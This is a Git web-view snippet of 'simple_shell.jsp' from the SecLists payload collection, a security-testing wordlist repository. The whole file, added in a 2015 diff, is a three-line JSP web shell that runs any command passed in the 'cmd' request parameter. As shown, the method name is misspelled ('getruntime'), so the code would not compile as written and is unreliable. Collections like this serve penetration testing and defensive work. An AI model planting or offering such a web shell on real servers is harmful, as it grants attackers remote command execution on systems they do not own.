SecLists/Payloads/simple_shell.jsp

4 lines
66 B
Plaintext
Raw Normal View History

2015-08-05 07:25:02 -07:00
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>